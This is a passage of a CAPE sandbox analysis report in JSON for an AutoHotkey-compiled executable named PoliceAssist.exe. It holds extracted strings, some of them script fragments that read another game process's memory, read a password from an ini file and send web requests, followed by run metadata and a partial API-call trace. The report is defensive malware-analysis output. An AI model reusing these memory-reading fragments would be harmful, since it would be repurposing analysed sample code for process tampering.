        "qrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqrqr",
        "Illegal group name.",
        "SetDefaultMouseSpeed",
        "WIN_7",
        "(|$PD",
        "%04d%02d",
        "@8{#u",
        "RegExReplace",
        "SetTimer, agun, 1",
        "<Nt4ff",
        "nothing to repeat",
        "AtlAxWinInit",
        "GuiControl, 1:, M3, % ahk[i]",
        "SUVATAUAVAWH",
        "t$ fD",
        "A;E$}",
        "Slider",
        "if !processID := ErrorLevel",
        "E fA;",
        "UnhandledExceptionFilter",
        "c?FA@s}",
        "Enabled",
        "CDecl",
        "(*MARK) must have an argument",
        "internal error: overran compiling workspace",
        "Remove",
        "A_A^A]A\\]",
        "9P(t!H",
        "result := DllCall(\"ReadProcessMemory\", \"Ptr\", hProccess, \"Ptr\", dwAdress, \"Ptr\", &buf, \"Ptr\", numBytes, \"PtrP\", numBytesRead, \"UInt\")",
        "gui, 6:font, s14",
        "Could not launch WindowSpy.ahk or AU3_Spy.exe",
        "\\$PM94$tpE",
        "fE9!thI",
        "\\$PH;",
        "Parameter #3 invalid.",
        "if not A_IsAdmin",
        "global sec, x, y, StatusAC:=1, M1, M2, M3, M4, M5, pstatus, pname, pfam, pid, nid, lid, autogun:=0",
        "RegisterWindowMessageW",
        "Hangul",
        "CoGetObject",
        "HeapAlloc",
        "LoopFileTimeAccessed",
        "\\P{Ll}",
        "`placement delete closure'",
        "GetArmour() {",
        "SysTabControl32",
        "Continue running the script?",
        "fE9&t",
        "MSDEVLineSelect",
        "u6HcD$0H",
        "VkKeyScanExW",
        "t$`E3",
        "Ucirc",
        "Tai_Viet",
        "ExitApp",
        "FileSelectFile",
        "LTrim",
        "[[[[[[[[[[[",
        "T$XA;",
        "D$@I9G",
        "HKEY_CURRENT_CONFIG",
        "September",
        "FlsAlloc",
        ".?AVtype_info@@",
        "T$xE3",
        "nu'E3",
        "GetClassNameW",
        "gui, 5:add, text, x10 y60 w250 cWhite  vpfam, ",
        "Launch_App2",
        "@USAUAWH",
        "unknown property name after \\P or \\p",
        "CompareStringW",
        "IfMsgBox",
        "h AVL",
        "UseErrorLevel",
        "l$0Lc",
        "f9>t#H",
        "Small",
        "]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]",
        "u[D8u",
        "UTF-8-RAW",
        "&Edit Script",
        "@SUWAUAVH",
        "u\"L9k",
        "FileAppend",
        "GetCurrentDirectoryW",
        " !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~",
        "@USVWATAUAVAWH",
        "StringUpper",
        "Monday",
        "Deseret",
        "MonitorFromPoint",
        "UVWATAUH",
        "li:=i",
        "Could not launch AutoHotkey.chm",
        "GetPrivateProfileStringW",
        "L$0H3",
        "AutoHotkey",
        "\"%s\" requires at least %d parameter%s.",
        "Status",
        "This line will never execute, due to %s preceding it.",
        "D$Ht?H",
        "Missing \":\"",
        "ScriptFullPath",
        "IsClipboardFormatAvailable",
        "t&fff",
        "Greek",
        "L$ Lc",
        "TabLeft",
        "gui, 1:hide",
        "[[[[[",
        "f9\\$ t,H",
        "Upper",
        "t#H9s",
        "0A]_[",
        "Hidden",
        "Can't delete menu (in use?).",
        "IsBuiltIn",
        "SendMessageW",
        "L$pH3",
        "[[[[[[",
        "\\p{Lu}",
        "&lsaquo;",
        "ATAUAWH",
        "Click",
        "D$`I9D$",
        "@SUAWH",
        "GetWindowRect",
        ">AUTOHOTKEY SCRIPT<(",
        "A^A\\^]",
        "@USVWAUH",
        "f;E`u",
        "Priority",
        "SetActiveWindow",
        "GuiControlGet",
        "RegConnectRegistryW",
        "SoundSet",
        "opengta()   {",
        "D$@fD",
        "Unexpected \"}\"",
        "digit",
        "InitialWorkingDir",
        "ContextMenu",
        ".?AV?$CKuStringT@_WVCKuStringUtilW@@@@",
        "CreateRectRgn",
        "bbbubb",
        "tEH;=",
        "fA9|$",
        "loop, Parse, file, `n, `r",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "SUVWATAVAWH",
        "AtlAxWin",
        "apt() {",
        "ATAUH",
        "t$Xffffff",
        "-------------------------------------------------------------------------------------------------------------",
        "A_A]_^]",
        "<>=/|^,:*&~!()[]{}\"",
        "CONTINUE",
        "\\$@H9",
        "yh:=5",
        "FileMove",
        "GetEnvironmentStringsW",
        "A^A]A\\^][",
        "T$Hfffff",
        "HKEY_LOCAL_MACHINE",
        ".?AVTextMem@@",
        "Gui, 3:Destroy",
        "<ttk<v",
        "SysLink",
        "8uu8f",
        "fA9;u'",
        "v$L;c",
        "D$qt&",
        "Ugaritic",
        "repeated subpattern is too long",
        "Mixer Doesn't Have That Many of That Component Type",
        "T$XIc",
        "Release",
        "MoveWindow",
        "_NewEnum",
        "A]A\\_[]",
        "PA]^]",
        "HcO H",
        "Could not close the previous instance of this script.  Keep waiting?",
        "#HotkeyModifierTimeout",
        "Process, close, gta_sa.exe",
        " in #include file \"%s\"",
        "A \":\" is missing its \"?\"",
        "fD9!u",
        "uCE8|$",
        "SetVolumeLabelW",
        "gui, 1:add, text,  cWhite vM5 x0 w250 Center, % ahk[i+2]",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "t$8Hc",
        "D$@H;",
        "D$QE+",
        "@8n#u",
        ")|$ I",
        "L$x;p |",
        "8L$3H",
        "- not enough space for stdio initialization",
        "IfExist",
        "Loudness",
        "\\$ UWATAVAWH",
        "Hiragana",
        "FileCreateDir, C:\\PA",
        "sjD8u?uLH;",
        "H9x8t%@8x!u",
        "GlobalLock",
        "\\p{Xps}",
        "t$xHc",
        "WantTab",
        "Ogham",
        "GetConsoleMode",
        "MSDEVColumnSelect",
        "xA\\_[]",
        "InternetReadFile",
        "Kharoshthi",
        "LastError",
        "Thick",
        "__ptr64",
        ".?AVProperty@@",
        "UTF-16-RAW",
        "Gurmukhi",
        "PixelSearch",
        "u5H;{8|",
        "t$XH;",
        "if apt",
        "+LastFoundExist",
        "@8t$8t",
        "Browser_Favorites",
        "System verbs unsupported with RunAs.",
        "SendPlay",
        "Invalid Control Type or Component Type",
        ";\"u>H",
        "return prread(getprocessid(), 0xBA18FC)",
        "+D$$Hc",
        "{Text}",
        "@SWAUH",
        "#WinActivateForce",
        "Invalid value.",
        "Kaithi",
        "BitShiftLeft",
        "Hc@$H",
        "IPAddress4",
        "Max window number is 20.",
        "|$r:tIf9t$p",
        "Uncheck",
        "VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVWVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVXYXYTZXY[[\\]]]",
        "Color",
        "USVWATAUAVAW",
        "@SAWH",
        "L$HD+L$@",
        "CommDlgExtendedError",
        "7fD9?",
        "Interrupt",
        "GuiControl",
        "EditPaste",
        "Check3",
        "RegExMatch(GetChatLine(), \"",
        "subpattern name expected",
        "if  (index == A_Index)",
        "t<fffff",
        "SetFocus",
        "#MaxHotkeysPerInterval 1000",
        "%03u: ",
        "FreeLibrary",
        "f9t$ tdH",
        "\\$ IcL$`H",
        "|$pA;",
        "GetMenuStringW",
        "Float",
        "if(GetKeyState(\"SPACE\", \"P\"))",
        "T$@u E3",
        "DragQueryPoint",
        "gui, 5:font, s14",
        "@SAVH",
        "fD93t-H",
        "upH9|$8t",
        "L$8E3",
        "H;L$HrM",
        "GuiControl, 5:,pid, ",
        ":+-*/|&^.",
        "A]_^[]",
        "WebRequest.Send()",
        "8D$$u6",
        "ControlGet",
        "iquest",
        "xdigit",
        "@8{^t",
        "D$PH;",
        "Tuesday",
        "H;F8t",
        "@8t$1t@95",
        "|$`H9C",
        "DeleteDC",
        "UserName",
        "A^A]A\\",
        "log10",
        "SB_SetParts",
        "GdiplusShutdown",
        "T$RHc",
        "b?^Cy",
        "HcC ;C$tmD",
        "fD9;urE",
        "SUWATAVAWH",
        "\\$0D;",
        "GetParent",
        "@VWATAUAVH",
        "u%fA9l$",
        "L$ VWATAUAVH",
        "LoopFileName",
        ";.tDH",
        "|$pE9",
        "9E v+H",
        "H+D$PLc",
        "italic",
        "Resize",
        "SetWindowLongW",
        "OnClipboardChange",
        "v#H;s",
        "NumGet",
        "L$HD;",
        "HelpFile:",
        "Oacute",
        "0x%08X",
        "#CommentFlag",
        "@A_A^A]A\\_^]",
        "|$@fD",
        "DPIScale",
        "DragQueryFileW",
        "uafE9h",
        "SetBrushOrgEx",
        "DeleteCriticalSection",
        "H;D$pr+H",
        "Border",
        "SysMonthCal32",
        "@8ydt",
        "OnExit",
        "Pause",
        "PA_A^A]A\\_^]",
        "T$p;QT|",
        "CloseClipboard",
        "IniRead, cmd, rp.ini",
        "uFfA9<$t*H",
        "<juuH",
        "gui, 3:font, s16",
        "2-hooks",
        "Is64bitOS",
        "Quote marks are required around this key.",
        "%GoU?*",
        "Numpad7",
        "Ctrl+K",
        "play AHK_PlayMe",
        "ToggleCheck",
        "__Class",
        "@A^A]_^[",
        "L$ H;",
        "Can't open clipboard for reading.",
        "d$xf9",
        "%s %s%s",
        "t$(E3",
        "AutoTrim",
        "ProcessName",
        "u$H9o",
        "l$(L+",
        "t$ UWAUAVAWH",
        "\\$0tN",
        "`scalar deleting destructor'",
        "iniread, pass, rp.ini, settings, pass",
        "t$PA;",
        "GetCPInfo",
        "E8~>t",
        "V @8x",
        "SetThreadPriority",
        "Volume_Down",
        "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[",
        "TimeIdleKeyboard",
        "CreateSolidBrush",
        "%s (%d) : ==> Warning: %s",
        "Unexpected \"{\"",
        "R6016"
      ],
      "cape_type_code": 0,
      "cape_type": ""
    }
  },
  "CAPE": {
    "payloads": [],
    "configs": []
  },
  "info": {
    "version": "2.4-CAPE",
    "started": "2025-11-20 13:58:15",
    "ended": "2025-11-20 14:02:02",
    "duration": 227,
    "id": 25,
    "category": "file",
    "custom": "",
    "machine": {
      "id": 19,
      "status": "stopping",
      "name": "MalwareGuest",
      "label": "MalwareGuest",
      "platform": "windows",
      "manager": "Proxmox",
      "started_on": "2025-11-20 13:58:15",
      "shutdown_on": "2025-11-20 14:02:01"
    },
    "package": "exe",
    "timeout": true,
    "tlp": null,
    "parent_sample": null,
    "options": {
      "interactive": "1",
      "nohuman": "yes"
    },
    "source_url": null,
    "route": "internet",
    "user_id": 0,
    "CAPE_current_commit": "b8e0bcad685cdd750a8c54cd86745809ad1c320b"
  },
  "behavior": {
    "processes": [
      {
        "process_id": 2552,
        "process_name": "explorer.exe",
        "parent_id": 2516,
        "module_path": "C:\\Windows\\explorer.exe",
        "first_seen": "2025-11-20 10:58:16,260",
        "calls": [
          {
            "timestamp": "2025-11-20 10:58:18,963",
            "thread_id": "3400",
            "caller": "0x7ffecd44e842",
            "parentcaller": "0x7ffee34e16e9",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000009b8"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00120089",
                "pretty_value": "FILE_GENERIC_READ"
              },
              {
                "name": "FileName",
                "value": "\\Device\\Bam"
              },
              {
                "name": "ShareAccess",
                "value": "7",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 0
          },
          {
            "timestamp": "2025-11-20 10:58:26,228",
            "thread_id": "2800",
            "caller": "0x7ffee2fb92b9",
            "parentcaller": "0x7ffee2ff224d",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "00000338-0000-0000-C000-000000000046"
              },
              {
                "name": "ClsContext",
                "value": "0x00000403",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD"
              },
              {
                "name": "riid",
                "value": "00000003-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 1
          },
          {
            "timestamp": "2025-11-20 10:58:26,228",
            "thread_id": "2996",
            "caller": "0x7ff736098fba",
            "parentcaller": "0x00000000",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "00000339-0000-0000-C000-000000000046"
              },
              {
                "name": "ClsContext",
                "value": "0x00000403",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD"
              },
              {
                "name": "riid",
                "value": "00000003-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 2
          },
          {
            "timestamp": "2025-11-20 10:58:26,228",
            "thread_id": "2996",
            "caller": "0x7ff736098fba",
            "parentcaller": "0x00000000",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "C2F03A33-21F5-47FA-B4BB-156362A2F239"
              },
              {
                "name": "ClsContext",
                "value": "0x00000404",
                "pretty_value": "CLSCTX_LOCAL_SERVER|CLSCTX_NO_CODE_DOWNLOAD"
              },
              {
                "name": "riid",
                "value": "6D5140C1-7436-11CE-8034-00AA006009FA"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 3
          },
          {
            "timestamp": "2025-11-20 10:58:26,291",
            "thread_id": "2768",
            "caller": "0x7ff73605c21a",
            "parentcaller": "0x7ff736042b6f",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "660B90C8-73A9-4B58-8CAE-355B7F55341B"
              },
              {
                "name": "ClsContext",
                "value": "0x00000003",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER"
              },
              {
                "name": "riid",
                "value": "21CBC515-2DDE-4D66-8292-BA34BD25094A"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 4
          },
          {
            "timestamp": "2025-11-20 10:58:26,291",
            "thread_id": "2768",
            "caller": "0x7ff73605c285",
            "parentcaller": "0x7ff736042b6f",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "shell32.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2330000"
              }
            ],
            "repeated": 0,
            "id": 5
          },
          {
            "timestamp": "2025-11-20 10:58:26,291",
            "thread_id": "2768",
            "caller": "0x7ff73605c285",
            "parentcaller": "0x7ff736042b6f",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000015d4"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100001",
                "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\"
              },
              {
                "name": "ShareAccess",
                "value": "7",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 6
          },
          {
            "timestamp": "2025-11-20 10:58:26,291",
            "thread_id": "2768",
            "caller": "0x7ff736081e2d",
            "parentcaller": "0x7ff73603c798",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\rsaenh.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedfb90000"
              }
            ],
            "repeated": 1,
            "id": 7
          },
          {
            "timestamp": "2025-11-20 10:58:26,291",
            "thread_id": "2768",
            "caller": "0x7ff73603dd72",
            "parentcaller": "0x7ff73603c5b7",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00001c74"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100081",
                "pretty_value": "FILE_READ_ACCESS|FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "7",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 8
          },
          {
            "timestamp": "2025-11-20 10:58:26,291",
            "thread_id": "2768",
            "caller": "0x7ff73603dd72",
            "parentcaller": "0x7ff73603c5b7",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00001c74"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100081",
                "pretty_value": "FILE_READ_ACCESS|FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Temp"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "7",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 9
          },
          {
            "timestamp": "2025-11-20 10:58:26,463",
            "thread_id": "2800",
            "caller": "0x7ffecd44e842",
            "parentcaller": "0x7ffee34e16e9",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000ce4"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00120089",
                "pretty_value": "FILE_GENERIC_READ"
              },
              {
                "name": "FileName",
                "value": "\\Device\\Bam"
              },
              {
                "name": "ShareAccess",
                "value": "7",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 10
          },
          {
            "timestamp": "2025-11-20 10:58:28,400",
            "thread_id": "2768",
            "caller": "0x7ff73603ddb7",
            "parentcaller": "0x7ff73603c5b7",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "00000323-0000-0000-C000-000000000046"
              },
              {
                "name": "ClsContext",
                "value": "0x00000001",
                "pretty_value": "CLSCTX_INPROC_SERVER"
              },
              {
                "name": "riid",
                "value": "00000146-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 11
          },
          {
            "timestamp": "2025-11-20 10:58:28,400",
            "thread_id": "2768",
            "caller": "0x7ff73603ddb7",
            "parentcaller": "0x7ff73603c5b7",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "shell32.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2330000"
              }
            ],
            "repeated": 0,
            "id": 12
          },
          {
            "timestamp": "2025-11-20 10:58:28,400",
            "thread_id": "2768",
            "caller": "0x7ff73603ddb7",
            "parentcaller": "0x7ff73603c5b7",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000015d4"
              },
              {
                "name": "DesiredAccess",
                "value": "0x80100080",
                "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Temp\\PoliceAssist.exe"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "1",
                "pretty_value": "FILE_SHARE_READ"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 13
          },
          {
            "timestamp": "2025-11-20 10:58:28,400",
            "thread_id": "2768",
            "caller": "0x7ff73603ddb7",
            "parentcaller": "0x7ff73603c5b7",
            "category": "system",
            "api": "NtDuplicateObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SourceProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "SourceHandle",
                "value": "0x000015d4"
              },
              {
                "name": "TargetProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "TargetHandle",
                "value": "0x00001c74"
              },
              {
                "name": "Options",
                "value": "0x00000002"
              }
            ],
            "repeated": 0,
            "id": 14
          },
          {
            "timestamp": "2025-11-20 10:58:28,400",
            "thread_id": "2768",
            "caller": "0x7ff73603ddb7",
            "parentcaller": "0x7ff73603c5b7",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000015d4"
              },
              {
                "name": "DesiredAccess",
                "value": "0x80100080",
                "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Temp\\PoliceAssist.exe"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 15
          },
          {
            "timestamp": "2025-11-20 10:58:28,400",
            "thread_id": "2768",
            "caller": "0x7ff73603ddb7",
            "parentcaller": "0x7ff73603c5b7",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x40000003",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x000015bc"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x10dc0000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x0013a000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 16
          },
          {
            "timestamp": "2025-11-20 10:58:28,400",
            "thread_id": "2768",
            "caller": "0x7ff73603ddb7",
            "parentcaller": "0x7ff73603c5b7",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x10dc0000"
              },
              {
                "name": "RegionSize",
                "value": "0x0013a000"
              }
            ],
            "repeated": 0,
            "id": 17
          },
          {
            "timestamp": "2025-11-20 10:58:28,400",
            "thread_id": "2768",
            "caller": "0x7ff73603ddb7",
            "parentcaller": "0x7ff73603c5b7",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000015d4"
              },
              {
                "name": "DesiredAccess",
                "value": "0x80100080",
                "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Temp\\PoliceAssist.exe"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 18
          },
          {
            "timestamp": "2025-11-20 10:58:28,400",
            "thread_id": "2768",
            "caller": "0x7ff73603ddb7",
            "parentcaller": "0x7ff73603c5b7",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x40000003",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x000015bc"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x10dc0000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x0013a000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 19
          },
          {
            "timestamp": "2025-11-20 10:58:28,400",
            "thread_id": "2768",
            "caller": "0x7ff73603ddb7",
            "parentcaller": "0x7ff73603c5b7",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x10dc0000"
              },
              {
                "name": "RegionSize",
                "value": "0x0013a000"
              }
            ],
            "repeated": 0,
            "id": 20
          },
          {
            "timestamp": "2025-11-20 10:58:28,400",
            "thread_id": "2768",
            "caller": "0x7ff73603ddb7",
            "parentcaller": "0x7ff73603c5b7",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000015d4"
              },
              {
                "name": "DesiredAccess",
                "value": "0x80100080",
                "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Temp\\PoliceAssist.exe"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 21
          },
          {
            "timestamp": "2025-11-20 10:58:28,400",
            "thread_id": "2768",
            "caller": "0x7ff73603ddb7",
            "parentcaller": "0x7ff73603c5b7",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x40000003",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x000015bc"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x10dc0000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x0013a000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 22
          },
          {
            "timestamp": "2025-11-20 10:58:28,400",
            "thread_id": "2768",
            "caller": "0x7ff73603ddb7",
            "parentcaller": "0x7ff73603c5b7",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x10dc0000"
              },
              {
                "name": "RegionSize",
                "value": "0x0013a000"
              }
            ],
            "repeated": 0,
            "id": 23
          },
          {
            "timestamp": "2025-11-20 10:58:28,400",
            "thread_id": "2768",
            "caller": "0x7ff73603ddb7",
            "parentcaller": "0x7ff73603c5b7",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000015d4"
              },
              {
                "name": "DesiredAccess",
                "value": "0x80100080",
                "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Temp\\PoliceAssist.exe"
              },
              {
